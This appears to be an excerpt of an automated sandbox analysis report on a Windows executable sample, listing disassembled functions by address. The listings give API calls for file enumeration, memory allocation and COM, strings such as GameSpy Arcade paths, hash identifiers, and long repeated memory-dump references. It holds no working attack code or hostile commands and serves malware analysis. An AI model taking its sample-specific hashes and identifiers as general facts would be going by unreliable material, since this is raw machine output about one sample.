                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLibraryMode$AddressFreeLoadProc
                                                                                                                                              • String ID: DllRegisterServer$dll
                                                                                                                                              • API String ID: 2523496102-3743520154
                                                                                                                                              • Opcode ID: ef9ba2a5713ceb03e6ce70ee764b4726849faacc317d9aed7e31cc120d4455a1
                                                                                                                                              • Instruction ID: 5463a6723183e0fd2573a7326bb506f65ba7a9fbe54e5d5f4bd9aa869cd4d228
                                                                                                                                              • Opcode Fuzzy Hash: ef9ba2a5713ceb03e6ce70ee764b4726849faacc317d9aed7e31cc120d4455a1
                                                                                                                                              • Instruction Fuzzy Hash: 7BE06C773812242B85116BE97C099CBF79CDFD77727024033FA00D3111CA65984596B9
                                                                                                                                              Function 00415858 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 204fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,0040F4C0), ref: 004158C6
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004158D5
                                                                                                                                              • FindFirstFileA.KERNEL32(?,0040F4C0), ref: 0041592D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 3541575487-438819550
                                                                                                                                              • Opcode ID: 21b5e472a939dc88e613e68adea4ee27e28d7efdd7dda9c45b768cfd0e207bba
                                                                                                                                              • Instruction ID: 82c4c8625ec48b706e964f5defe62e3f166b5be27307af7ce1f69a47df756571
                                                                                                                                              • Opcode Fuzzy Hash: 21b5e472a939dc88e613e68adea4ee27e28d7efdd7dda9c45b768cfd0e207bba
                                                                                                                                              • Instruction Fuzzy Hash: 9971B771208B86CBC725CB249450BFBB7E9BFC6345F544A2EE8CA87201DB359846C797
                                                                                                                                              Function 00414697 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 3541575487-438819550
                                                                                                                                              • Opcode ID: ff1870f39b35a9e64cf155c50654656466c85049f1f2ce81a176109cbe950176
                                                                                                                                              • Instruction ID: 664cd25a3782574f27417e97decbe08ee3e65bcafea3b4704871a912b5d67fad
                                                                                                                                              • Opcode Fuzzy Hash: ff1870f39b35a9e64cf155c50654656466c85049f1f2ce81a176109cbe950176
                                                                                                                                              • Instruction Fuzzy Hash: 9D5114355087C58BD721DF2498247EBB7E5FFD2342F18492AE8C587340EB38988AC795
                                                                                                                                              Function 0040AC10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040AC64
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040ACB5
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040AD05
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID: %s\%s$%s\Arcade*.exe$%s\GameSpy
                                                                                                                                              • API String ID: 3541575487-1719408586
                                                                                                                                              • Opcode ID: d67195a3238f5f57d1dd2343961741220b1b4093bba5da21d9414279efcebce8
                                                                                                                                              • Instruction ID: ba2843077a888f8c0d9f31af973d8caf28e7bd1786c0ac93db22295fa0225a35
                                                                                                                                              • Opcode Fuzzy Hash: d67195a3238f5f57d1dd2343961741220b1b4093bba5da21d9414279efcebce8
                                                                                                                                              • Instruction Fuzzy Hash: 0B21E5721083006BE320EB90DC45FEB739DEBC4301F44892FBA55561C1EBBC620986AB
                                                                                                                                              Function 00414290 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 004142A8
                                                                                                                                              • FindClose.KERNEL32(00000000,00000000,?,Found! (FileExists),00000000), ref: 004142D9
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414301
                                                                                                                                              Strings
                                                                                                                                              • Found! (FileExists), xrefs: 004142CB
                                                                                                                                              • FindFirstFile returned INVALID_HANDLE_VALUE, xrefs: 00414323
                                                                                                                                              • File is a directory (FileExists), xrefs: 004142F3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$Close$FileFirst
                                                                                                                                              • String ID: File is a directory (FileExists)$FindFirstFile returned INVALID_HANDLE_VALUE$Found! (FileExists)
                                                                                                                                              • API String ID: 3046750681-696252916
                                                                                                                                              • Opcode ID: 9358b9d398efbeaedbf88955095f5e19847b83186bca4ece126a06245336cc21
                                                                                                                                              • Instruction ID: f179452c76eb578ae544a1bee184078c8abbbeec53593ee830497973ded0bfe5
                                                                                                                                              • Opcode Fuzzy Hash: 9358b9d398efbeaedbf88955095f5e19847b83186bca4ece126a06245336cc21
                                                                                                                                              • Instruction Fuzzy Hash: 9C014E363812102AD5203B15AC16FEB67549BD7735F14002BFDA8B72D1C17E204ED67D
                                                                                                                                              Function 00430717 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _TranslateName.LIBCMT ref: 00430772
                                                                                                                                              • _TranslateName.LIBCMT ref: 004307BB
                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,00000082,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 0043081F
                                                                                                                                              • IsValidLocale.KERNEL32(00000001), ref: 00430835
                                                                                                                                                • Part of subcall function 00430605: EnumSystemLocalesA.KERNEL32(0043021B,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430625
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem
                                                                                                                                              • String ID: Norwegian-Nynorsk
                                                                                                                                              • API String ID: 25477102-461349085
                                                                                                                                              • Opcode ID: 1d989896bc01b99306157691cb7343851a378502ff2dffd7fc8ab0248d4c7af6
                                                                                                                                              • Instruction ID: 2f20a2206e1c076148d7ff7e681dfdc67b3553f714d7ef80d5f25f58bdb4048b
                                                                                                                                              • Opcode Fuzzy Hash: 1d989896bc01b99306157691cb7343851a378502ff2dffd7fc8ab0248d4c7af6
                                                                                                                                              • Instruction Fuzzy Hash: 7B4119716112409BD7B0AF619CB1A2F37E0AF49300F156A3FE541963A1E72CB84DCB6E
                                                                                                                                              Function 0042407C Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00424096
                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 004240A7
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004240ED
                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0042412B
                                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,0000001C), ref: 00424151
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4136887677-0
                                                                                                                                              • Opcode ID: f92df4dc610bf4f209ae5d1d387623058e6c3484833d4ddbf4b0e73c3023e66a
                                                                                                                                              • Instruction ID: 3ae70e2e835963f036367eda34e548a546d7b1799bd96947dc5649064c90c0b6
                                                                                                                                              • Opcode Fuzzy Hash: f92df4dc610bf4f209ae5d1d387623058e6c3484833d4ddbf4b0e73c3023e66a
                                                                                                                                              • Instruction Fuzzy Hash: 7531D476E00229ABDF10CBA4ED499EDBBB8EB45354F540066E901E3241D7348E91CB98
                                                                                                                                              Function 0042B2AC Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0042B2C7
                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0042B2D3
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0042B2DB
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0042B2E3
                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0042B2EF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                              • Opcode ID: 624e0785466e7938e43d15d0758950ebdaea816835ec01d6f61c555c6e2ae7b9
                                                                                                                                              • Instruction ID: 32fabd2bde9cb4d14f74efbfe84cc1875d2bfc2f5d6faedfeadbc5f05a32322d
                                                                                                                                              • Opcode Fuzzy Hash: 624e0785466e7938e43d15d0758950ebdaea816835ec01d6f61c555c6e2ae7b9
                                                                                                                                              • Instruction Fuzzy Hash: B3F0FF75D002249BCB10EBF4ED0C49EB7F8FF0A345B830961E811E7211DB34A9008A89
                                                                                                                                              Function 0040F900 Relevance: 4.6, APIs: 3, Instructions: 102comCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040F740: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104,?,0040F91B,00000001,?), ref: 0040F763
                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0040F924
                                                                                                                                              • CoCreateInstance.OLE32(0044EC20,00000000,00000001,0044EC10,?,00000001,?), ref: 0040F942
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040F9F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
